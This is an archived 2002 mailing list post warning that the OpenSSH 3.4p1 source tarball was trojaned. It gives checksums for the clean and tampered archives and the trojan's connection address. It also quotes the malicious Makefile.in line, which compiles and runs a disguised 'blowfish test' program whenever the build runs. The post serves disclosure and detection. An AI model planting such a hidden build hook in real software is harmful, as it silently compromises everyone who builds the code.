Firewall Wizards mailing list archives
OpenSSH 3.4p1 possibly trojaned
From: "Paul D. Robertson" <proberts () patriot net>
Date: Thu, 1 Aug 2002 07:31:00 -0400 (EDT)
[Mod Note: No, I'm not going to post every vuln that comes down the pike- but this one is potentially significant.] http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security It would appear that the OpenSSH code for all the non-OpenBSD systems was trojaned at some point pretty recently. I just checked the MD5 (and sources) of the version I put on my public-facing systems, and it's the same as the FreeBSD ports one (clean): # md5sum openssh-3.4p1.tar.gz 459c1d0262e939d6432f193c7a4ba8a8 openssh-3.4p1.tar.gz I got that copy around 19:43 Eastern on July 17th. If you pulled a copy after that, it's probably worth a check. ------------------------------------------------------------------------ Things to check: MD5 of the trojaned tar.gz: 3ac9bc346d736b4a51d676faa2a08a57 Source addition: openssh-3.4p1/openbsd-compat/Makefile.in: all: libopenbsd-compat.a + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out & Trojan connection: 203.62.158.32:6667 (web.snsonline.net) ---------------------------------------------------------------------- I just downloaded openssh from ftp://ftp.openbsd.org and the changes described in the advisory are present. I haven't yet verified the trojan code is as described, but it looks to be code masquerading as blowfish test code in the compat library which isn't in the original source distribution I downloaded on the 17th. Given that this isn't p2- the change seems enough justification to feed this forward. Paul ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts () patriot net which may have no basis whatsoever in fact." probertson () trusecure com Director of Risk Assessment TruSecure Corporation _______________________________________________ firewall-wizards mailing list firewall-wizards () honor icsalabs com http://honor.icsalabs.com/mailman/listinfo/firewall-wizards
Current thread:
- OpenSSH 3.4p1 possibly trojaned Paul D. Robertson (Aug 01)
- Re: OpenSSH 3.4p1 possibly trojaned Paul D. Robertson (Aug 01)
- Re: OpenSSH 3.4p1 possibly trojaned hennings (Aug 01)